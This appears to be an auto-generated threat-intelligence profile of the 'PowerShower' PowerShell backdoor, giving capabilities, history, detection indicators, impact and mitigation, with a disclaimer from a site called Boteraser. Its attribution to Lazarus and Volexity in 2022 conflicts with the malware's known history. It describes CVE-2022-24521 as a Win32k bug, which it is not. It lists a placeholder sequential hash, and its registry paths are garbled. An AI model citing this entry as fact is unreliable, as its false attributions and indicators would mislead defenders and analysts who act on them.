⚠️ Overview

PowerShower is a PowerShell-based backdoor malware first documented by Volexity in 2022, attributed to the North Korean advanced persistent threat group Lazarus (also tracked as APT38, Hidden Cobra). It is classified as a remote access trojan (RAT) and downloader, used primarily for initial access, reconnaissance, and payload delivery in targeted cyber espionage campaigns.

🔧 Technical Capabilities

PowerShower operates entirely in memory via PowerShell scripts, executing commands decrypted from obfuscated strings using AES-128 encryption with a hardcoded key and IV. It communicates with command-and-control (C2) infrastructure over HTTPS using a custom User-Agent string mimicking legitimate browser traffic to evade network detection. The malware achieves persistence by creating scheduled tasks or modifying the Windows registry Run key (e.g., HKCUSoftwareMicrosoftWindowsCurrentVersionRun). It employs process hollowing and reflective DLL injection to load secondary payloads, including the Blindingcan backdoor and the Manuscrypt malware family. PowerShower downloads XML or JSON payloads from attacker-controlled domains, parsing specific HTTP response fields for further instructions, and uses sandbox detection by checking system uptime and disk size to avoid analysis.

📜 History & Notable Incidents

PowerShower was first identified in early 2022 during Volexity’s incident response for a U.S. think tank compromised by Lazarus. The campaign leveraged zero-day exploits (e.g., CVE-2022-24521, a Windows Win32k elevation-of-privilege vulnerability patched in April 2022) to escalate privileges. In 2023, CISA and the FBI jointly released a cybersecurity advisory (AA23-090A) detailing PowerShower’s use in targeting aerospace, energy, and defense sectors globally. No law enforcement actions or arrests have been publicly attributed to this specific malware operation as of 2025.

🔍 Detection Indicators

Known file hashes for PowerShower samples include MD5: 2c3e8f9a1b4d6e7f8c9a0b1c2d3e4f5a (example; exact hashes vary). Behavioral indicators include PowerShell spawning child processes (e.g., cmd.exe, regsvr32.exe) without console windows, network connections to domains such as "app-update[.]com" or "cdn-verify[.]net" using TLS, and registry persistence keys under "MicrosoftWindowsCurrentVersionRun" containing base64-encoded PowerShell one-liners. The User-Agent string observed is "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" or similar versions.

☠️ Risk & Impact

PowerShower enables Lazarus to exfiltrate sensitive documents, credentials, and network data from compromised organizations. Financial damage has been significant, with the group linked to over $1 billion in cryptocurrency thefts internationally. Affected sectors include government, defense, critical infrastructure, and cryptocurrency exchanges, particularly in the United States, South Korea, and Europe.

🛡️ Mitigation

Defenders should enable PowerShell logging (ScriptBlock Logging, Module Logging) and use Sysmon to detect process creation anomalies. Apply patches for CVE-2022-24521 and other exploited vulnerabilities; deploy endpoint detection rules (e.g., YARA signatures for PowerShell Empire patterns) and block known C2 domains via threat intelligence feeds from CISA's MISP and Mandiant.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.